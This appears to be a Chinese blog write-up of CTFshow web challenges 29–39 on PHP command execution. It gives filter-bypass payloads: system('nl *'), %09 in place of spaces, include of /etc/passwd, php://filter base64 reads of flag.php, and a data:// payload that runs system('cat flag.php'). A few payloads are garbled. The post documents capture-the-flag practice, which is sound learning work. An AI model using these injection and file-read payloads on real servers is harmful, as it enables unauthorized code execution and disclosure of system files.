CTFshow web 入门持续更新 冲冲冲

*1 命令执行篇
web29
在这里插入图片描述
很明显绕过就可以
上c=system(‘nl *’);

在这里插入图片描述
web30
在这里插入图片描述
这里注意要绕过system
这就要用到echo函数
c=echo( nl *`);
同理web31过滤空格
用trb %09绕过

web32
在这里插入图片描述
这个题就比较骚了 过滤了echo system 空格
基本上上面的方法都没法用
那我们怎么去解题呢??
首先尝试文件包含
include"/etc/passwd"?>
发现可以运行
在这里插入图片描述
这就说明可以运行的通,并且它没有过滤$
还有一个问题include包含php文件不会在页面显示出来,尝试include"$_POST[1]"?>
1=/etc/passwd
成功执行
联系上面
完全可以利用为协议
构造?c=include$_POST[1]?>
1=php://filter/read=convert.base64-encode/resource=flag.php
下面解释一下eval函数,把字符串当成php代码执行
在这里插入图片描述
我们知道到eval之后
我们想执行为协议
那么我们就要通过post方式去执行为协议
因为eval函数的缘故
1=php://filter/read=convert.base64-encode/resource=flag.php
执行漏洞并呈现到屏幕上
同理34,35

同33
36

将1改为a即可

data:// 协议

条件:
    allow_url_fopen:on
    allow_url_include :on
作用:自PHP>=5.2.0起,可以使用data://数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。

下面上38题
在这里插入图片描述

payload:data:text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
base解码是

<?php system('cat flag.php');?>

39
在这里插入图片描述

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值